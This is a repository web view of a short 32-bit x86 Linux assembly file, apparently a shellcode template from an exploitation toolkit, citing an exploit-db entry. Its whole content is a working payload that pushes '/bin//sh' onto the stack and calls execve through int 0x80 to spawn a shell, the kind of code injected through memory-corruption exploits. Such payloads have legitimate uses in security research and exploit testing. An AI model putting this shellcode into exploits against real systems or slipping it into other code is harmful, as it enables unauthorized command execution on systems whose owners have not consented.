summaryrefslogtreecommitdiffstats
path: root/templates/shellcode/shell32.asm
blob: d12910f08dad1316af1b9ad0e7f293578bf18fd5 (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[SECTION .text]
global _start

; https://www.exploit-db.com/shellcodes/46809

_start:
    xor     ecx, ecx
    push    0xb
    pop     eax
    push    ecx
    push    0x68732f2f
    push    0x6e69622f
    mov     ebx, esp
    int     0x80